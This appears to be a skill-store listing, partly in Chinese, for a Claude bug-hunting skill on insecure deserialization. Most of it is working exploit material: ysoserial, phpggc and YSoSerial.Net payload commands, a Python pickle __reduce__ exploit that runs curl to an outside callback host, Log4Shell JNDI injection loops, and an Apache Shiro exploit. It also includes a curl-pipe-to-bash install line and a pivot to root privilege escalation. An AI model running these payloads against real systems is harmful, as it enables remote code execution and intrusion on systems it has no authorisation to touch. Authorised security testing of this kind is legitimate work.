hunt-deserialization
Hunt Insecure Deserialization — Java gadget chains (ysoserial), PHP object injection (phpggc), Python pickle RCE, .NET BinaryFormatter, Ruby Marshal.load, JNDI/Log4Shell. RCE via deserialization is almost always Critical. Use when target runs Java, PHP serialization, Python pickle, .NET, or Ruby on Rails.
适合你,如果需要在Java、PHP、Python等应用中挖掘反序列化漏洞
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
~/.claude/skills/(项目级 .claude/skills/)~/.codex/skills/npx oh-my-skill add elementalsouls/claude-bughunter/hunt-deserializationcurl -fsSL https://oh-my-skill.com/install.sh | bash -s -- elementalsouls/claude-bughunter/hunt-deserializationnpx oh-my-skill verify elementalsouls/claude-bughunter/hunt-deserialization怎么用
商店整理自技能原文 · 版本 05098fc · 表述以原文为准装上后,Claude 会帮你检测和利用不安全的反序列化漏洞,包括 Java、PHP、Python、.NET、Ruby 和 Log4Shell 等场景,并生成对应的攻击载荷。
当目标运行 Java、PHP 序列化、Python pickle、.NET 或 Ruby on Rails 时触发。
技能原文 SKILL.md
HUNT-DESERIALIZATION — Insecure Deserialization
Crown Jewel Targets
Deserialization bugs are almost always Critical — they lead directly to RCE without prerequisite conditions.
Highest-value chains:
- Java ysoserial gadget chains — CommonsCollections, Spring, JNDI, Groovy gadgets → full OS command execution
- PHP Object Injection —
__wakeup/__destructmagic methods → file write / RCE - Python pickle —
pickle.loads(attacker_data)→__reduce__→os.system('id') - .NET BinaryFormatter — TypeConfuseDelegate gadget chain → RCE
- Ruby Marshal.load — Gem::Requirement, Gem::Installer gadgets → RCE
- JNDI injection — Log4Shell pattern:
${jndi:ldap://attacker/a}→ class load → RCE
Attack Surface Signals
Detection Patterns
# Java serialized objects start with AC ED 00 05 (hex) or rO0A (base64)
echo "rO0ABXQ=" | base64 -d | xxd | head -1 # shows: ac ed 00 05
# PHP serialization: O:8:"stdClass":0:{}
# Python pickle: starts with \x80\x04 (protocol 4) or \x80\x02
# Apache Shiro: rememberMe cookie present
curl -sI https://$TARGET/ | grep -i "Set-Cookie.*rememberMe"
# Log4j: test user-controlled fields for JNDI interpolation
curl -H 'User-Agent: ${jndi:dns://COLLAB_HOST/a}' https://$TARGET/
Header / Cookie Signals
Content-Type: application/x-java-serialized-object Cookie containing rO0= prefix (Java base64 serialized) Cookie: rememberMe= (Apache Shiro) Cookie: _VIEWSTATE (ASP.NET ViewState without encryption) Endpoints: /remoting/, /invoker/, /jmx-console/, /wls-wsat/
Step-by-Step Hunting Methodology
Phase 1 — Java Deserialization (ysoserial)
# Install ysoserial
wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
# Generate OOB detection payload
java -jar ysoserial-all.jar CommonsCollections6 \
'curl http://COLLAB_HOST/ysoserial' | base64 -w0
# Send as body or cookie
java -jar ysoserial-all.jar CommonsCollections6 'id > /tmp/pwned' | base64 | \
curl -s https://$TARGET/wls-wsat/CoordinatorPortType \
-H "Content-Type: application/x-java-serialized-object" \
--data-binary @-
# Apache Shiro exploit (default AES key)
python3 shiro_exploit.py -u https://$TARGET/ -c "id"
Phase 2 — PHP Object Injection
# Find unserialize() calls in source
grep -r "unserialize(" --include="*.php" .
# Inject test: O:8:"stdClass":1:{s:4:"test";s:5:"value";}
# Send in cookie, POST param, or hidden form field
# If error changes → deserialization confirmed
# Craft gadget chain using phpggc
git clone https://github.com/ambionics/phpggc
php phpggc -l # list chains
php phpggc Laravel/RCE5 system id | base64
Phase 3 — Python Pickle
# Generate OOB payload
python3 -c "
import pickle, os, base64
class Exploit(object):
def __reduce__(self):
return (os.system, ('curl http://COLLAB_HOST/pickle-rce',))
print(base64.b64encode(pickle.dumps(Exploit())).decode())
"
# Send as cookie or POST body
curl -s https://$TARGET/api/load-model \
-H "Content-Type: application/octet-stream" \
--data-binary @payload.pkl
Phase 4 — .NET ViewState
# Check if ViewState is unsigned (MAC disabled) # Look for __VIEWSTATE in HTML source without __VIEWSTATEMAC # YSoSerial.Net dotnet YSoSerial.exe -f BinaryFormatter -g TypeConfuseDelegate \ -c "cmd /c curl http://COLLAB_HOST/viewstate-rce" -o base64
Phase 5 — Log4Shell / JNDI
# Test all user-controlled inputs
COLLAB="COLLAB_HOST"
for HEADER in "User-Agent" "X-Forwarded-For" "Referer" "X-Api-Version" "Accept-Language"; do
curl -s https://$TARGET/ -H "$HEADER: \${jndi:dns://$COLLAB/$HEADER}" &
done
# Test POST body fields
curl -s -X POST https://$TARGET/api/login \
-H "Content-Type: application/json" \
-d "{\"username\": \"\${jndi:ldap://$COLLAB/a}\"}"
Phase 6 — Ruby Marshal
# Look for Marshal.load in source grep -r "Marshal.load\|Marshal.restore" --include="*.rb" . # Gem::Requirement gadget chain via marshalable objects # Use ruby-advisory-db gadgets
Chain Table
| Deserialization signal | Chain to | Impact | |-----------------------|----------|--------| | Any deser RCE | /etc/passwd + id output | Prove arbitrary command execution | | RCE as low-privilege user | Find SUID binaries / sudo rules | Privilege escalation → root | | Blind RCE (OOB callback) | DNS callback → confirm exec | Sufficient for Critical PoC | | Log4Shell | LDAP → JNDI → class load | Full RCE on JVM process |
Automation
# OOB listener interactsh-client -v -n 5 # JNDI exploit kit git clone https://github.com/pimps/JNDI-Exploit-Kit
Validation
✅ DNS/HTTP callback from COLLAB host: blind deserialization confirmed ✅ Command output in response: full RCE confirmed
Severity: Almost always Critical — RCE with server process privileges.